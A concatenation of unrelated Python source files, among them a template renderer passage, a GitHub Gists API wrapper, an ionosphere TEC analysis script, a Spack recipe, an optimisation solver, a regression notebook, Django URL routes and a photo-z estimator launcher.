#print ' token:' + string_func(token)
tag, content, scope = token
if tag == TOKEN_RAW:
yield string_func(content)
elif tag == TOKEN_TAG:
tagvalue = _lookup(data, content)
#cant use if tagvalue because we need to render tagvalue if it's 0
#testing if tagvalue == 0, doesnt work since False == 0
if tagvalue is not None and tagvalue is not False:
try:
if len(tagvalue) > 0:
if scope:
yield string_func(tagvalue)
else:
yield escape(string_func(tagvalue))
except TypeError:
if scope:
yield string_func(tagvalue)
else:
yield escape(string_func(tagvalue))
elif tag == TOKEN_TAGOPEN or tag == TOKEN_TAGINVERT:
tagvalue = _lookup(data, content)
untilclose = itertools_takewhile(lambda x: x != (TOKEN_TAGCLOSE, content, scope), tokens)
if (tag == TOKEN_TAGOPEN and tagvalue) or (tag == TOKEN_TAGINVERT and not tagvalue):
if hasattr(tagvalue, 'items'):
#print ' its a dict!', tagvalue, untilclose
for part in self._parse(untilclose, tagvalue, *data):
yield part
else:
try:
iterlist = list(iter(tagvalue))
if len(iterlist) == 0:
raise TypeError
#print ' its a list!', list(rest)
#from http://docs.python.org/library/itertools.html#itertools.tee
#In general, if one iterator uses most or all of the data before
#another iterator starts, it is faster to use list() instead of tee().
rest = list(untilclose)
for listitem in iterlist:
for part in self._parse(iter(rest), listitem, *data):
yield part
except TypeError:
#print ' its a bool!'
for part in self._parse(untilclose, *data):
yield part
else:
for ignore in untilclose:
pass
elif tag == TOKEN_BOOL:
tagvalue = _lookup(data, content)
untilclose = itertools_takewhile(lambda x: x != (TOKEN_TAGCLOSE, content, scope), tokens)
if tagvalue:
for part in self._parse(untilclose, *data):
yield part
else:
for part in untilclose:
pass
elif tag == TOKEN_PARTIAL:
if content in self.templates:
for part in self._parse(iter(list(self.templates[content])), *data):
yield part
elif tag == TOKEN_PUSH:
untilclose = itertools_takewhile(lambda x: x != (TOKEN_TAGCLOSE, content, scope), tokens)
data[-1][content] = ''.join(self._parse(untilclose, *data))
elif tag == TOKEN_TAGDELIM:
self.otag, self.ctag = content
def _jsparse(self, tokens):
self.otag = '{{'
self.ctag = '}}'
for token in tokens:
tag, content, scope = token
if tag == TOKEN_RAW:
yield "'{0}'".format(string_func(content))
elif tag == TOKEN_TAG:
if content != '':
if scope:
yield "lookup(data, '{0}')".format(content)
else:
yield "htmlEncode(lookup(data, '{0}'))".format(content)
elif tag == TOKEN_TAGOPEN or tag == TOKEN_TAGINVERT or tag == TOKEN_BOOL:
untilclose = itertools_takewhile(lambda x: x != (TOKEN_TAGCLOSE, content, scope), tokens)
inside = self._jsparse(untilclose)
if tag == TOKEN_TAGOPEN:
pre = "return section(data, lookup(data, tag), function (data) {"
post = "});"
self.hoist["__section{0}".format(len(self.hoist))] = _renderjsfunction(inside, pre, post)
yield "__section{1}(data, '{0}')".format(content, len(self.hoist)-1)
elif tag == TOKEN_TAGINVERT:
pre = "return section(data, lookup(data, tag), function (data) {"
post = "}, true);"
self.hoist["__section{0}".format(len(self.hoist))] = _renderjsfunction(inside, pre, post)
yield "__section{1}(data, '{0}')".format(content, len(self.hoist)-1)
elif tag == TOKEN_BOOL:
pre = "var tagvalue = lookup(data, tag); if ((!isArray(tagvalue) && tagvalue) || (isArray(tagvalue)) && tagvalue.length > 0){"
post = "}"
self.hoist["__section{0}".format(len(self.hoist))] = _renderjsfunction(inside, pre, post)
yield "__section{1}(data, '{0}')".format(content, len(self.hoist)-1)
elif tag == TOKEN_PARTIAL:
yield "templates['{0}'](data)".format(content)
elif tag == TOKEN_PUSH:
untilclose = itertools_takewhile(lambda x: x != (TOKEN_TAGCLOSE, content, scope), tokens)
self.hoist_data[content] = _renderjsfunction(self._jsparse(untilclose), params="data")
elif tag == TOKEN_TAGDELIM:
self.otag, self.ctag = content
|
from libsaas import http, parsers
from libsaas.services import base
from . import resource
class GistCommentsBase(resource.GitHubResource):
path = 'comments'
def wrap_object(self, obj):
return {'body': obj}
class GistComments(GistCommentsBase):
@base.apimethod
def get(self, format=None, page=None, per_page=None):
url = self.get_url()
params = base.get_params(('page', 'per_page'), locals())
headers = resource.mimetype_accept(format)
return http.Request('GET', url, params, headers), parsers.parse_json
class GistComment(GistCommentsBase):
@base.apimethod
def get(self, format=None, page=None, per_page=None):
url = self.get_url()
params = base.get_params(('page', 'per_page'), locals())
headers = resource.mimetype_accept(format)
return http.Request('GET', url, params, headers), parsers.parse_json
class Gists(resource.GitHubResource):
path = 'gists'
@base.apimethod
def public(self, page=None, per_page=None):
"""
Fetch public gists. The parameters are the same as for `get`.
"""
url = '{0}/public'.format(self.get_url())
params = base.get_params(('page', 'per_page'), locals())
return http.Request('GET', url, params), parsers.parse_json
@base.apimethod
def starred(self, page=None, per_page=None):
"""
Fetch gists starred by the authenticated user. The parameters are the
same as for `get`.
"""
url = '{0}/starred'.format(self.get_url())
params = base.get_params(('page', 'per_page'), locals())
return http.Request('GET', url, params), parsers.parse_json
@base.resource(GistComment)
def comment(self, comment_id):
"""
Return the resource corresponding to a single comment on a gist.
When updating comments, use a simple string as the parameter to
`update`, you don't have to use `{"body": <comment body>}`.
"""
return GistComment(self, comment_id)
class Gist(resource.GitHubResource):
path = 'gists'
@base.apimethod
def star(self):
"""
Star this gist.
"""
url = '{0}/{1}'.format(self.get_url(), 'star')
# include a body, because requests does not send content-length when no
# body is present, and that makes GitHub respond with HTTP 411
return http.Request('PUT', url, params='*'), parsers.parse_empty
@base.apimethod
def unstar(self):
"""
Unstar this gist.
"""
url = '{0}/{1}'.format(self.get_url(), 'star')
return http.Request('DELETE', url), parsers.parse_empty
@base.apimethod
def is_starred(self):
"""
Check if this gist is starred.
:return: bool
"""
url = '{0}/{1}'.format(self.get_url(), 'star')
return http.Request('GET', url), resource.parse_boolean
@base.apimethod
def fork(self):
"""
Fork this gist.
"""
url = '{0}/{1}'.format(self.get_url(), 'fork')
return http.Request('POST', url), parsers.parse_json
def comments(self):
"""
Return the resource corresponding to all comments on this gist.
When creating comments, use a simple string as the parameter to
`create`, you don't have to use `{"body": <comment body>}`.
"""
return GistComments(self)
|
#imports (standard ones first, then the ones I wrote)
import numpy as np #for data structures
from scipy.io import netcdf #to read DART data
from scipy.interpolate import griddata #for interpolation
from scipy import interpolate
import subprocess #for moving files
import sys
import cPickle as pickle
import datetime, time #for keeping track of GITM files
import math #for pi
import matplotlib
matplotlib.use('Agg') #so as not to need a display or X-server
import matplotlib.pyplot as plt #for plotting
from matplotlib.patches import Polygon
from mpl_toolkits.mplot3d import Axes3D #for 3d plotting
import read_gitm_bin #module I wrote for reading gitm binary files
import read_gps_txt #module I wrote for reading gps text files
import plot_tec_lib #module I wrote for plotting tec
def tecify(time, Lon, Lat, Alt, Eds):
"""
compute VTEC from electron density (Eds)
INPUTS:
- time[ti] - np.array of "datetime" times
- Lon[n] - np.array of lons
- Lat[t] - np.array of lats
- Alt[a] - np.array of alts
- Eds[n,t,a,ti] - np.array over [lon,lat,alt,time]
OUTPUTS:
- Vtec_r[n,t,ti] - np.array over [lon,lat,time]
"""
dh = np.diff(Alt) #Alt(i+1)-Alt(i)
H = np.diag(np.ones(len(Alt), float)) + np.diag(np.ones(len(Alt)-1, float),k=1)
H = H[0:-1,:] #np.dot(H,I) will result in sum of neighbors = [I(2)+I(1), I(3)+I(2), ..., I(50)+I(49)]
Vtec_r=np.zeros( (len(Lon), len(Lat), len(time)), float )
for ti in range(len(time)): #I just ran it for 1 day
Vtec = np.zeros( (len(Lon),len(Lat)), float )
for n in range(len(Lon)):
for t in range(len(Lat)):
Vtec_r[n,t,ti] = np.dot(dh, np.dot(H,Eds[n,t,:,ti]))/2.0 * 10.0**-16 #tec=(A2-A1)*(f2+f1)/2 - trapezoidal rule, 10^-16 is the TECU
return Vtec_r
#contains - I use this keyword as separation of function defenitions from actual calls. this is opposite of Fortran, but oh well
fn_gitm = sys.argv[1] #where the truth files are
fn_gps = sys.argv[2] #where the gps observation text file is
sim = sys.argv[3] in ['true', 'True', '.true.', 'T', 't', '1', True] #was this gps file simulated (True) or real (False)? eg sim = 'True' for simulated. Affects what gets comparred to what below (search sim) and what gets plotted
#read GITM binary files
timeT1 = datetime.datetime(2002, 12, 1, 0, 5, 0) #when did you start you truth simulation? and note that GITM produces first file AFTER one full step (ie if you started at 0 minutes and asked it to write every 5 minutes, the first file will show up at 5 min)
timeT = np.array([ timeT1 + datetime.timedelta(minutes=m) for m in range(0, 30, 5)]) #assumes you ran gitm for 30 minutes with step of 5 minutes
print 'Reading GITM binary files... '
#to save time in subsequent reads, I only read truth data once and pickle it (into fn+'.p') and use the pickled file everytime afterwards
try:
f = open( fn_gitm+'.p', 'rb' )
print 'pickled file found, reading it'
(LonT, LatT, AltT, EdsT) = pickle.load(f)
f.close()
except:
print 'pickled file not found, making one'
(LonT, LatT, AltT, EdsT) = read_gitm_bin.read(timeT, fn_gitm)
f = open( fn_gitm+'.p', 'wb' )
pickle.dump((LonT, LatT, AltT, EdsT) , f)
f.close()
print 'Done w/ GITM binary files.'
LonT=LonT*180/math.pi #convert to degrees
LatT=LatT*180/math.pi #convert to degrees
VtecT = tecify(timeT, LonT, LatT, AltT, EdsT)
#read DART netcdf files
print 'Reading DART netcdf files... '
f = netcdf.netcdf_file('../work/preassim.nc', 'r')
#f.dimensions
#for d in dir(f): print d
#for d in f.variables: print d
timeE1 = f.variables['time'].data #timeE.units 'days since 1601-01-01 00:00:00'
#convert dart time to unix epoch time (seconds since 1970 1 1)
# to do that, add the original dart base of 1601 and subtract the unix base of 1970
tdiff = (datetime.datetime(1970,1,1)-datetime.datetime(1601,1,1)).total_seconds()
timeE = timeE1*86400 - tdiff
timeE = np.array([ datetime.datetime.utcfromtimestamp(t) for t in timeE ]) #convert unix epoch to datetime
#tt = (timeT - datetime.datetime(1970,1,1)).total_seconds() #convert timeT to unix epoch time
LonE = f.variables['LON'].data
LatE = f.variables['LAT'].data
AltE = f.variables['ALT'].data
f.variables['ie_IDensityS'].dimensions
type(f.variables['ie_IDensityS'].dimensions)
#f.variables['ie_IDensityS'].T.dimensions
EdsEr = f.variables['ie_IDensityS'].data[:,0,:,:,:].T #np.array over [time,copy,alt,lat,lon], where copy=0 means ensemble mean, 1 ens. var, possibly ens. members themself (if you change num_output_state_members in input.nml to nonzero values) and then -2 is inflation_value at every step (see section 9 in DART tutorial and inf_initial in input.nml) and -1 is inflation_sdandard_deviation (see inf_sd_initial in input.nml)
#Transpose is needed because dart writes it in [time,alt,lat,lon], whereas I want [lon,lat,alt,time], so only a reversal (=transpose) is needed
EdssdEr = f.variables['ie_IDensityS'].data[:,1,:,:,:].T #standard deviation
f107Er = f.variables['f107'].data[:,0,0] #[time,copy,wavelength] - mean, just 1 wavelength for now
f107sdEr = f.variables['f107'].data[:,1,0] #standard deviation
f.close()
f = netcdf.netcdf_file('../work/analysis.nc', 'r')
EdsEo = f.variables['ie_IDensityS'].data[:,0,:,:,:].T #mean
EdssdEo = f.variables['ie_IDensityS'].data[:,1,:,:,:].T #standard deviation
f107Eo = f.variables['f107'].data[:,0,0] #mean
f107sdEo = f.variables['f107'].data[:,1,0] #sd
f.close()
f = netcdf.netcdf_file('../work/obs_diag_output.nc', 'r')
#for d in dir(f): print d
#for d in f.variables: print d
#for d in range(21): print d, ''.join(f.variables['CopyMetaData'][d])
obs_time = f.variables['time'].data
obs_time = obs_time*86400 - (datetime.datetime(1970,1,1)-datetime.datetime(1601,1,1)).total_seconds()
obs_time = np.array([ datetime.datetime.utcfromtimestamp(t) for t in obs_time ]) #convert unix e
obs_vposs_r = f.variables['GND_GPS_VTEC_guess'][:,0,3,0]
obs_vused_r = f.variables['GND_GPS_VTEC_guess'][:,1,3,0]
obs_vrmse_r = f.variables['GND_GPS_VTEC_guess'][:,6,3,0]
obs_vbias_r = f.variables['GND_GPS_VTEC_guess'][:,7,3,0]
obs_vspread_r = f.variables['GND_GPS_VTEC_guess'][:,8,3,0]
obs_vtotspread_r = f.variables['GND_GPS_VTEC_guess'][:,9,3,0]
obs_vbadqc_r = f.variables['GND_GPS_VTEC_guess'][:,10,3,0]
obs_vtruth_r = f.variables['GND_GPS_VTEC_guess'][:,11,3,0]
obs_vensm_r = f.variables['GND_GPS_VTEC_guess'][:,12,3,0]
obs_vposs_o = f.variables['GND_GPS_VTEC_analy'][:,0,3,0]
obs_vused_o = f.variables['GND_GPS_VTEC_analy'][:,1,3,0]
obs_vrmse_o = f.variables['GND_GPS_VTEC_analy'][:,6,3,0]
obs_vbias_o = f.variables['GND_GPS_VTEC_analy'][:,7,3,0]
obs_vspread_o = f.variables['GND_GPS_VTEC_analy'][:,8,3,0]
obs_vtotspread_o = f.variables['GND_GPS_VTEC_analy'][:,9,3,0]
obs_vbadqc_o = f.variables['GND_GPS_VTEC_analy'][:,10,3,0]
obs_vtruth_o = f.variables['GND_GPS_VTEC_analy'][:,11,3,0]
obs_vensm_o = f.variables['GND_GPS_VTEC_analy'][:,12,3,0]
f.close()
print 'Done w/ DART netcdf files.'
VtecE = tecify(timeE, LonE, LatE, AltE, EdsEo)
#load gps vtec data
timeD, LonD, LatD, VtecD, VtecsdD = read_gps_txt.read(fn_gps)
if sim:
timeD1= timeD #if sim data, no need to shift time
else:
timeD1 = timeD + datetime.timedelta(seconds=150) #timeD is shifted by 2.5 minutes so it matches timeT (only for plotting purposes)
tcommon = sorted(set(timeT) & set(timeE) & set(timeD1)) #plot only at common times
#sequence of 2dplots of only data
#execfile('plot_data_2d.py')
#sequence of 3dplots of data with eakf estimates and with truth
#execfile('plot_gps_3d.py')
#fit a surface to gps data at every timestep
VtecDi = np.zeros( (len(LonE), len(LatE), len(tcommon) ), float)
for ti in range(len(tcommon)):
x = LonD[timeD1==tcommon[ti]]
y = LatD[timeD1==tcommon[ti]]
z = VtecD[timeD1==tcommon[ti]]
VtecDi[:,:,ti] = griddata((x, y), z, np.meshgrid(LonE, LatE), method='linear', fill_value=0).T #BEWARE of fill_value=0!!!!!, Transpose is needed because meshgrid creates Lon that varies inside a row instead of column!
#more legit interpolation way (including time), but doesn't work yet
#VtecDi = np.zeros( (len(LonE), len(LatE), len(tcommon) ), float)
#loni, lati = np.meshgrid(LonE, LatE)
#for ti in range(len(timeE)):
# lon = LonD[abs(timeD-timeE[ti]) < datetime.timedelta(minutes=30)]
# lat = LatD[abs(timeD-timeE[ti]) < datetime.timedelta(minutes=30)]
# time = time.mktime(timeD[abs(timeD-timeE[ti]) < datetime.timedelta(minutes=30)].timetuple())
# vtec = VtecD[abs(timeD-timeE[ti]) < datetime.timedelta(minutes=30)]
# timei = np.empty_like(loni, object)
# timei[:] = timeE[ti]
# griddata((lon, lat, time), vtec, (loni, lati, timei), method='linear') # fill_value=0
# VtecDi[:,:,ti] = griddata((lon, lat, time), vtec, (loni, lati, timei), method='linear') # fill_value=0
#sequence of 3dplots
#execfile('plot_gps_3d_interp.py')
#ensemble - data
VtecED = np.zeros( (len(LonE), len(LatE), len(tcommon) ), float)
for ti in range(len(tcommon)):
if sim: #simulated data, want to compare est with truth
VtecED[:,:,ti] = abs(VtecE[:,:,np.where(timeE==list(tcommon)[ti])[0][0]] - VtecT[:,:,np.where(timeT==list(tcommon)[ti])[0][0]])
else: #real data, want to compare est with real
VtecED[:,:,ti] = abs(VtecE[:,:,np.where(timeE==list(tcommon)[ti])[0][0]] - VtecDi[:,:,ti])
#interpolate the diff so it looks nicer on plots
res = 1.0 #lat,lon resolution to which interpolate the data
loni = np.arange(min(LonE)+res,max(LonE),res) #what lons do you want to interpolate it to
lati = np.arange(min(LatE)+res,max(LatE),res) #what lons do you want to interpolate it to
VtecEDi = np.zeros( (len(loni), len(lati), len(tcommon) ), float)
for ti in range(len(tcommon)):
f = interpolate.RectBivariateSpline(LonE,LatE,VtecED[:,:,ti])
for t in range(len(lati)):
for n in range(len(loni)):
VtecEDi[n,t,ti] = f( loni[n], lati[t] )
#memory was an issue, so here is how to check:
# for i in dir():
# try:
# print (i, eval(i).nbytes )
# except:
# print (i, sys.getsizeof(eval(i)) )
#sequence of 3dplots
#execfile('plot_diff_2d.py')
#execfile('plot_diff_2d_f107.py')
lona=13 #index of Lon closest to Ann Arbor
lata=13 #index of Lat closest to Ann Arbor
alta=34 #index of Alt I chose
print 'LonT[lona], LatT[lata], AltT[alta], EdsT[lona,lata,alta,0], EdsEr[lona,lata,alta,0], EdsEo[lona,lata,alta,0]', LonT[lona], LatT[lata], AltT[alta], EdsT[lona,lata,alta,0], EdsEr[lona,lata,alta,0], EdsEo[lona,lata,alta,0]
ind = obs_vrmse_r>0
if sim: #simulated data, want to compare est with truth
#f107 vs time plot
plot_tec_lib.time_plot(timeT,[148.0]*len(timeT),'$F_{10.7}$ measured', timeE,f107Er,f107Eo,f107sdEr,f107sdEo,'$F_{10.7}$ estimated','$F_{10.7}$ estimated $\pm$ SD', (0,24),(100,300),'$F_{10.7}$ [SFU]', 'f107_00')
#Eds[13,13,34,:] vs time plot
plot_tec_lib.time_plot(timeT, EdsT[lona,lata,alta,:], '$D_{e,aa}$ measured', timeE, EdsEr[lona,lata,alta,:], EdsEo[lona,lata,alta,:], EdssdEr[lona,lata,alta,:], EdssdEo[lona,lata,alta,:], '$D_{e,aa}$ estimated', '$D_{e,aa}$ estimated $\pm$ SD', (0,24), (None,None), '$D_{e,AA}$ [$e$ $m^{-3}$]', 'daa00')
#obs_diag rmse vs time plot
plot_tec_lib.time_plot(obs_time[ind], obs_vtruth_r[ind],'ignore', obs_time[ind], obs_vrmse_r[ind], obs_vrmse_o[ind], obs_vspread_r[ind], obs_vspread_o[ind], 'Average VTEC error', 'Average VTEC spread ($\pm$ SD)', (0,24),(0,10),'Average VTEC error [TECU]', 'obs_rmse00')
else:
#f107 vs time plot
plot_tec_lib.time_plot(timeT,[148.0]*len(timeT),'ignore', timeE,f107Er,f107Eo,f107sdEr,f107sdEo,'$F_{10.7}$ estimated','$F_{10.7}$ estimated $\pm$ SD', (0,24),(100,300),'$F_{10.7}$ [SFU]', 'f107_00')
#Eds[13,13,34,:] vs time plot
plot_tec_lib.time_plot(timeT, EdsT[lona,lata,alta,:], 'ignore', timeE, EdsEr[lona,lata,alta,:], EdsEo[lona,lata,alta,:], EdssdEr[lona,lata,alta,:], EdssdEo[lona,lata,alta,:], '$D_{e,aa}$ estimated', '$D_{e,aa}$ estimated $\pm$ SD', (0,24), (None,None), '$D_{e,AA}$ [$e$ $m^{-3}$]', 'daa00')
#obs_diag rmse vs time plot
plot_tec_lib.time_plot(obs_time[ind], obs_vtruth_r[ind],'ignore', obs_time[ind], obs_vrmse_r[ind], obs_vrmse_o[ind], obs_vspread_r[ind], obs_vspread_o[ind], 'Average VTEC error', 'Average VTEC spread ($\pm$ SD)', (0,24),(0,16),'Average VTEC error [TECU]', 'obs_rmse00')
#Eds[13,13,:,:] vs time, alt subplots
#plot_tec_lib.time_plot_alt(timeT, EdsT[lona,lata,:,:], AltT, '$D_{e,aa}$ measured', timeE, EdsEr[lona,lata,:,:], EdsEo[lona,lata,:,:], EdssdEr[lona,lata,:,:], EdssdEo[lona,lata,:,:], '$D_{e,aa}$ estimated', '$D_{e,aa}$ estimated $\pm$ SD', (0,24), (1e8,1e12), '$D_{e,AA}$ [$e$ $m^{-3}$]', 'daa_alt00')
#error vs time plot
#plot_tec_lib.time_plot(timeT,[1e32.0]*len(timeT),'ignore', np.array(list(tcommon)),VtecED[:,:,ti],f107Eo,f107sdEr,f107sdEo,'$F_{10.7}$ estimated','$F_{10.7}$ estimated $\pm$ SD', (0,24),(100,300),'$F_{10.7}$ [SFU]', 'f107_00')
#obs_diag mean vs time plot
ind = obs_vrmse_r>0
plot_tec_lib.time_plot(obs_time[ind], obs_vtruth_r[ind],'VT', obs_time[ind], obs_vensm_r[ind], obs_vensm_o[ind], obs_vspread_r[ind], obs_vspread_o[ind], 'ensm', 'spread', (None,None),(None,None),'Vensm', 'obs_ens00')
#write interpolated Truth data into a dart obs file
#execfile('write_gps_txt.py')
# DART $Id$
# from Alexey Morozov
# <next few lines under version control, do not edit>
# $URL$
# $Revision$
# $Date$
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RAssertiveNumbers(RPackage):
"""assertive.numbers: Assertions to Check Properties of Numbers
A set of predicates and assertions for checking the
properties of numbers. This is mainly for use by other
package developers who want to include run-time testing
features in their own packages. End-users will usually want
to use assertive directly."""
homepage = "https://bitbucket.org/richierocks/assertive.numbers"
url = "https://cloud.r-project.org/src/contrib/assertive.numbers_0.0-2.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/assertive.numbers"
version('0.0-2', sha256='bae18c0b9e5b960a20636e127eb738ecd8a266e5fc29d8bc5ca712498cd68349')
depends_on('r@3.0.0:', type=('build', 'run'))
depends_on('r-assertive-base@0.0-2:', type=('build', 'run'))
|
from torch import nn
from torch.optim import SGD
from flamecalc.utils import *
from tqdm import tqdm
class CalVarSolver(nn.Module):
def __init__(self, functional, start_point, end_point, domain=None):
super().__init__()
self.functional = functional
self.p_1 = start_point
self.p_2 = end_point
if domain is None:
self.domain = torch.linspace(self.p_1[0], self.p_2[0], 100)
else:
if domain[0] != start_point[0] or domain[-1] != end_point[0]:
raise ValueError(
"Given domain and boundary points do not match"
)
self.domain = domain
def forward(self, theta: torch.Tensor):
m = theta.shape[1]
y_0 = y0(self.p_1, self.p_2, self.domain)
x_s = sin_matrix(m, self.domain)
x_c = cos_matrix(m, self.domain)
residual = torch.matmul(theta, x_s)
residual_d = torch.matmul(theta, x_c)
y = y_0 + residual
a = (self.p_1[1] - self.p_2[1])/(self.p_1[0] - self.p_2[0])
dy = a + residual_d
fy = self.functional(y, dy, self.domain.unsqueeze(0))
result = torch.trapz(fy, self.domain.unsqueeze(0))
return {'result': result, 'y': y, 'dy': dy}
def optimize(self, theta=None, optimizer=None, lr=0.002, epoch=2000, m=5):
if theta is None:
theta = torch.rand((1, m), requires_grad=True)
losses = []
add_loss = losses.append
if optimizer is None:
optimizer = SGD([theta], lr=lr)
p_bar = tqdm(range(epoch), ncols=150)
for i in p_bar:
result = self.forward(theta)
loss = result["result"]
optimizer.zero_grad()
loss.backward()
optimizer.step()
add_loss(loss.detach().numpy()[0])
p_bar.set_description(f"Epoch {i + 1}/{epoch} | "
f"value: {loss.detach().numpy()[0]:.5f}")
result = self.forward(theta)
y, dy = result["y"], result["dy"]
return {"theta": theta, "y": y, "dy": dy, "log": losses}
|
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 15 15:45:45 2020
@author: Boxi
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as seabornInstance
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn import metrics
data = pd.read_csv("season_stats_merged.csv")
data.shape
data.describe()
data.isnull().any()
# drop all NA values
cleaned = data.dropna()
cleaned.isnull().any()
X = cleaned[['Year', 'Age', 'height', 'weight']]
y = cleaned['TS%'].values
plt.figure(figsize=(15,10))
plt.tight_layout()
seabornInstance.distplot(cleaned['TS%'])
# most TS% around 0.5
# split data into training and test
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,
random_state=0)
# train model
regressor = LinearRegression()
regressor.fit(X_train, y_train)
coeff_df = pd.DataFrame(regressor.coef_, X.columns, columns=['Coefficient'])
coeff_df
# predictions on test data
y_pred = regressor.predict(X_test)
# difference between actual & predicted value
df = pd.DataFrame({'Actual': y_test, 'Predicted': y_pred})
df1 = df.head(25)
df1
# plot comparison of Actual vs Predicted values
df1.plot(kind='bar', figsize=(10,8))
plt.grid(which='major', linestyle='-', linewidth='0.5', color='green')
plt.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
plt.show()
# evaluate performance by looking at MAE, MSE, RMSE
print('Mean Absolute Error:', metrics.mean_absolute_error(y_test, y_pred))
print('Mean Squared Error:', metrics.mean_squared_error(y_test, y_pred))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(y_test, y_pred)))
y.mean()
|
# -*- coding: utf-8 -*-
import sys, codecs
from tqdm import tqdm
SRC_FILE = sys.argv[1]
CONTENT_PLAN = sys.argv[2]
EVAL_OUTPUT = sys.argv[3] # tuples
CONTENT_PLAN_INTER = sys.argv[4]
TRAIN = True
DELIM = u"│"
inputs = []
content_plans = []
with codecs.open(CONTENT_PLAN, "r", "utf-8") as corpus_file:
for _, line in enumerate(corpus_file):
content_plans.append(line.split())
with codecs.open(SRC_FILE, "r", "utf-8") as corpus_file:
for _, line in enumerate(corpus_file):
inputs.append(line.split())
outputs = []
eval_outputs = []
for i, input in tqdm(enumerate(inputs)):
content_plan = content_plans[i]
output = []
eval_output = []
records = set()
for record in content_plan:
output.append(input[int(record)])
elements = input[int(record)].split(DELIM)
if elements[0].isdigit():
record_type = elements[2]
if not elements[2].startswith('TEAM'):
record_type = 'PLAYER-' + record_type
# only record digits ??
eval_output.append("|".join([elements[1].replace("_", " ").strip('<').strip('>'), elements[0], record_type]))
outputs.append(" ".join(output))
eval_outputs.append("\n".join(eval_output))
# output_file = codecs.open(EVAL_OUTPUT, 'w', "utf-8")
# output_file.write("\n")
# output_file.write("\n\n".join(eval_outputs))
# output_file.write("\n")
# output_file.close()
output_file = codecs.open(CONTENT_PLAN_INTER, 'w', "utf-8")
output_file.write("\n".join(outputs))
output_file.write("\n")
output_file.close()
|
from django.conf import settings
from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.views.generic import TemplateView
from views import get_api_home, jquery_test_view, home
from videos.views import category_list, category_detail, video_detail
from billing.views import braintree_upgrade, billing_history, braintree_cancel_subscription, payu_upgrade, payu_notify, account_upgrade
from accounts.views import account_dashboard
from comments.views import comment_thread, comment_create_view
from notifications.views import all, get_notifications_ajax, read
from srvup.views import send_feedback
from rest_framework import routers
from rest_framework_jwt.views import obtain_jwt_token
from videos.serializers import VideoViewSet, CategoryViewSet
from comments.serializers import CommentViewSet
from videos.views import CategoryListAPIView, CategoryDetailAPIView, VideoDetailAPIView
from comments.views import CommentAPICreateView, CommentDetailAPIView, CommentListAPIView
router = routers.DefaultRouter()
router.register(r'categories', CategoryViewSet)
router.register(r'comments', CommentViewSet)
router.register(r'videos', VideoViewSet)
urlpatterns = [
# default API router
url(r'^api/', include(router.urls)),
url(r'^api/auth/', include('rest_framework.urls', namespace='rest_framework')),
# in order to get an auth token we need to make curl reqeust (it uses django-rest-framework-jwt/)
# curl -X POST -d "username=admin&password=abc123" http://localhost:8000/api-token-auth/
# to get the access with a token: curl -H "Authorization: JWT <your_token>" http://localhost:8000/protected-url/
url(r'^api/auth/token/$', obtain_jwt_token),
# Lists all categories we have
url(r'^api2/categories/$', CategoryListAPIView.as_view(), name='category_list_api'),
url(r'^api2/categories/(?P<slug>[\w-]+)/$', CategoryDetailAPIView.as_view(), name='category_detail_api'),
url(r'^api2/categories/(?P<cat_slug>[\w-]+)/(?P<vid_slug>[\w-]+)/$', VideoDetailAPIView.as_view(), name='video_detail_api'),
url(r'^api2/comment/$', CommentListAPIView.as_view(), name='comment_list_api'),
url(r'^api2/comment/create/$', CommentAPICreateView.as_view(), name='comment_create_api'),
url(r'^api2/comment/(?P<id>\d+)/$', CommentDetailAPIView.as_view(), name='comment_detail_api'),
# new APIs for jquery test
url(r'^api2/$', get_api_home, name='api_home'),
url(r'^jquery-test/$', jquery_test_view, name='jquery_test_view'),
# Project main navigation map
url(r'^$', home, name='home'),
url(r'^contact_us/$', TemplateView.as_view(template_name='company/contact_us.html'), name='contact_us'),
url(r'^categories/$', category_list, name='categories'),
url(r'^categories/(?P<cat_slug>[\w-]+)/$', category_detail, name='cat_detail'),
url(r'^categories/(?P<cat_slug>[\w-]+)/(?P<vid_slug>[\w-]+)/$', video_detail, name='video_detail'),
url(r'^admin/', admin.site.urls),
url(r'^send_feedback/$', send_feedback, name='send_feedback'),
]
# enrollment
urlpatterns += [
url(r'^billing/upgrade/$', account_upgrade, name='account_upgrade'),
url(r'^billing/history/$', billing_history, name='billing_history'),
url(r'^billing/braintree_upgrade/$', braintree_upgrade, name='braintree_upgrade'),
url(r'^billing/braintree_cancel$', braintree_cancel_subscription, name='braintree_cancel_subscription'),
url(r'^billing/payu_upgrade/$', payu_upgrade, name='payu_upgrade'),
url(r'^billing/payu_notify/$', payu_notify, name='payu_notify'),
]
# auth login/logout/register
urlpatterns += [
url(r'^accounts/dashbaord/$', account_dashboard, name='account_dashboard'),
url(r'^accounts/', include('allauth.urls')),
]
# Comment Thread
urlpatterns += [
url(r'^comments/(?P<id>\d+)/$', comment_thread, name='comment_thread'),
url(r'^comments/create/$', comment_create_view, name='comment_create'),
]
# Notifications Thread
urlpatterns += [
url(r'^notifications/$', all, name='notifications_all'),
url(r'^notifications/ajax/$', get_notifications_ajax, name='get_notifications_ajax'),
url(r'^notifications/read/(?P<id>\d+)/$', read, name='notifications_read'),
]
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
import sys
import os
import yaml
from tables_io import io
from rail.estimation.estimator import Estimator
# Note: This is where 'base.yaml' actually belongs, but how to make it so
def main(argv):
if len(argv) == 2:
# this is in case hiding the base yaml is wanted
input_yaml = argv[1]
base_config = 'base.yaml'
elif len(argv) == 3:
input_yaml = argv[1]
base_config = argv[2]
else:
print(len(argv))
print("Usage: main <config yaml file> [base config yaml]")
sys.exit()
with open(input_yaml, 'r') as f:
run_dict = yaml.safe_load(f)
name = run_dict['run_params']['class_name']
try:
Estimator._find_subclass(name)
except KeyError:
raise ValueError(f"Class name {name} for PZ code is not defined")
code = Estimator._find_subclass(name)
print(f"code name: {name}")
pz = code(base_config, run_dict)
